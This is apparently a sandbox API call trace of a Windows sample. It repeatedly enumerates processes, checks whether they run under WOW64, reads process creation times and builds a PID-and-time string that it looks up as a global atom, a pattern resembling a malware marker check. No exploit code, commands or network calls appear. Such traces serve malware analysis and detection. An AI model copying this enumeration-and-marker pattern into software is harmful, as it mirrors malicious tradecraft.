	[0098.588] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.588] CloseHandle (hObject=0x368) returned 1
	[0098.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x368
	[0098.588] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0098.588] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0098.588] GetProcessTimes (in: hProcess=0x368, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0098.588] wsprintfA (in: param_1=0x675cc8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0098.589] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0098.589] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0098.589] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0098.589] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0098.589] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0098.589] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0098.589] CloseHandle (hObject=0x368) returned 1
	[0098.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0098.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0098.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x368
	[0098.590] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.590] CloseHandle (hObject=0x368) returned 1
	[0098.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x368
	[0098.590] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.590] CloseHandle (hObject=0x368) returned 1
	[0098.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0098.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0098.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0098.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0098.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0098.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0098.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0098.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0098.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0098.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0098.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0098.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0098.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0098.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0098.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0098.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0098.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0098.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0098.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x368
	[0098.690] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.691] CloseHandle (hObject=0x368) returned 1
	[0098.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0098.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0098.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x368
	[0098.691] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.691] CloseHandle (hObject=0x368) returned 1
	[0098.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0098.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x368
	[0098.691] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.691] CloseHandle (hObject=0x368) returned 1
	[0098.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x368
	[0098.692] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.692] CloseHandle (hObject=0x368) returned 1
	[0098.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x368
	[0098.692] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.692] CloseHandle (hObject=0x368) returned 1
	[0098.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x368
	[0098.692] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.692] CloseHandle (hObject=0x368) returned 1
	[0098.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x368
	[0098.692] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.692] CloseHandle (hObject=0x368) returned 1
	[0098.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x368
	[0098.692] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.692] CloseHandle (hObject=0x368) returned 1
	[0098.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0098.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x368
	[0098.693] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.693] CloseHandle (hObject=0x368) returned 1
	[0098.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x368
	[0098.693] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.693] CloseHandle (hObject=0x368) returned 1
	[0098.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x368
	[0098.693] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.693] CloseHandle (hObject=0x368) returned 1
	[0098.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x368
	[0098.693] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.693] CloseHandle (hObject=0x368) returned 1
	[0098.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x368
	[0098.693] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.693] CloseHandle (hObject=0x368) returned 1
	[0098.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x368
	[0098.694] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.694] CloseHandle (hObject=0x368) returned 1
	[0098.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x368
	[0098.694] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.694] CloseHandle (hObject=0x368) returned 1
	[0098.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x368
	[0098.694] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.694] CloseHandle (hObject=0x368) returned 1
	[0098.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x368
	[0098.694] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.694] CloseHandle (hObject=0x368) returned 1
	[0098.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x368
	[0098.694] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.694] CloseHandle (hObject=0x368) returned 1
	[0098.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x368
	[0098.695] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.695] CloseHandle (hObject=0x368) returned 1
	[0098.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x368
	[0098.695] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.695] CloseHandle (hObject=0x368) returned 1
	[0098.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x368
	[0098.695] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.695] CloseHandle (hObject=0x368) returned 1
	[0098.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x368
	[0098.695] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.695] CloseHandle (hObject=0x368) returned 1
	[0098.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x368
	[0098.695] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.695] CloseHandle (hObject=0x368) returned 1
	[0098.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x368
	[0098.696] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.696] CloseHandle (hObject=0x368) returned 1
	[0098.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x368
	[0098.696] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.696] CloseHandle (hObject=0x368) returned 1
	[0098.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x368
	[0098.696] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.696] CloseHandle (hObject=0x368) returned 1
	[0098.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x368
	[0098.696] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.696] CloseHandle (hObject=0x368) returned 1
	[0098.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x368
	[0098.696] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.696] CloseHandle (hObject=0x368) returned 1
	[0098.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x368
	[0098.697] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.697] CloseHandle (hObject=0x368) returned 1
	[0098.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x368
	[0098.697] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.697] CloseHandle (hObject=0x368) returned 1
	[0098.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x368
	[0098.697] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.697] CloseHandle (hObject=0x368) returned 1
	[0098.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x368
	[0098.698] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0098.698] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0098.698] GetProcessTimes (in: hProcess=0x368, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0098.698] wsprintfA (in: param_1=0x667b70, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0098.698] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0098.698] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0098.698] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0098.699] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0098.699] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0098.699] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0098.699] CloseHandle (hObject=0x368) returned 1
	[0098.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0098.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0098.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x368
	[0098.699] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.699] CloseHandle (hObject=0x368) returned 1
	[0098.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x368
	[0098.699] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.699] CloseHandle (hObject=0x368) returned 1
	[0098.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0098.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0098.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0098.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0098.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0098.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0098.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0098.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0098.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0098.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0098.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0098.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0098.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0098.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0098.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0098.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0098.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0098.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0098.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x368
	[0098.800] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.800] CloseHandle (hObject=0x368) returned 1
	[0098.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0098.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0098.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x368
	[0098.801] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.801] CloseHandle (hObject=0x368) returned 1
	[0098.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0098.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x368
	[0098.801] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.801] CloseHandle (hObject=0x368) returned 1
	[0098.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x368
	[0098.801] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.801] CloseHandle (hObject=0x368) returned 1
	[0098.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x368
	[0098.802] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.802] CloseHandle (hObject=0x368) returned 1
	[0098.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x368
	[0098.802] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.802] CloseHandle (hObject=0x368) returned 1
	[0098.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x368
	[0098.802] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.802] CloseHandle (hObject=0x368) returned 1
	[0098.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x368
	[0098.802] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.802] CloseHandle (hObject=0x368) returned 1
	[0098.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0098.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x368
	[0098.802] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.802] CloseHandle (hObject=0x368) returned 1
	[0098.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x368
	[0098.803] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.803] CloseHandle (hObject=0x368) returned 1
	[0098.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x368
	[0098.803] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.803] CloseHandle (hObject=0x368) returned 1
	[0098.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x368
	[0098.803] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.803] CloseHandle (hObject=0x368) returned 1
	[0098.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x368
	[0098.803] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.803] CloseHandle (hObject=0x368) returned 1
	[0098.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x368
	[0098.803] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.803] CloseHandle (hObject=0x368) returned 1
	[0098.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x368
	[0098.804] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.804] CloseHandle (hObject=0x368) returned 1
	[0098.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x368
	[0098.804] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.804] CloseHandle (hObject=0x368) returned 1
	[0098.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x368
	[0098.804] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.804] CloseHandle (hObject=0x368) returned 1
	[0098.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x368
	[0098.804] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.804] CloseHandle (hObject=0x368) returned 1
	[0098.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x368
	[0098.804] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.804] CloseHandle (hObject=0x368) returned 1
	[0098.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x368
	[0098.805] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.805] CloseHandle (hObject=0x368) returned 1
	[0098.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x368
	[0098.805] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.805] CloseHandle (hObject=0x368) returned 1
	[0098.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x368
	[0098.805] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.805] CloseHandle (hObject=0x368) returned 1
	[0098.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x368
	[0098.805] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.805] CloseHandle (hObject=0x368) returned 1
	[0098.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x368
	[0098.805] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.805] CloseHandle (hObject=0x368) returned 1
	[0098.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x368
	[0098.805] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.805] CloseHandle (hObject=0x368) returned 1
	[0098.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x368
	[0098.806] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.806] CloseHandle (hObject=0x368) returned 1
	[0098.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x368
	[0098.806] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.806] CloseHandle (hObject=0x368) returned 1
	[0098.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x368
	[0098.806] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.806] CloseHandle (hObject=0x368) returned 1
	[0098.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x368
	[0098.806] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.806] CloseHandle (hObject=0x368) returned 1
	[0098.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x368
	[0098.806] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.806] CloseHandle (hObject=0x368) returned 1
	[0098.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x368
	[0098.807] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.807] CloseHandle (hObject=0x368) returned 1
	[0098.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x368
	[0098.807] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0098.807] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0098.807] GetProcessTimes (in: hProcess=0x368, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0098.808] wsprintfA (in: param_1=0x667b70, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0098.808] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0098.808] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0098.808] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0098.808] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0098.808] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0098.808] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0098.808] CloseHandle (hObject=0x368) returned 1
	[0098.808] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0098.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0098.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x368
	[0098.809] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.809] CloseHandle (hObject=0x368) returned 1
	[0098.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x368
	[0098.809] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.809] CloseHandle (hObject=0x368) returned 1
	[0098.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
